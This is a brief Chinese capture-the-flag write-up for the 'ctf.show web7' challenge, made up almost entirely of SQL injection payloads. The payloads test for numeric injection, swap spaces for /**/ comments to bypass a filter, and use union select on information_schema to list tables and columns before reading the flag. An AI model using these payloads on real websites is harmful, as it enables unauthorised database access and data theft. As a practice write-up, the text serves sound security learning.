ctf.show web7

判断字符型

1'报错

1'#更换'反复尝试如果正常返回为字符型注入

判断数字型注入的方法

1'与原界面返回不同或报错

1/**/and/**/1=1与原页面返回相同

1/**/and/**/1=2与原页面返回不同 即可得出为数字型

?id=1/**/order/**/by/**/3#与原页面返回相同

?id=-1/**/union/**/select/**/1,2,3#

查表id=-1/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema=database()

查列id=-1/**/union/**/select/**/1,group_concat(column_name),3/**/from/**/information_schema.columns/**/where/**/table_name=0x666c6167

查字段记录值

?id=-1/**/union/**/select/**/1,flag,3/**/from/**/flag

你可能感兴趣的:(CTF,WEB,web安全,安全)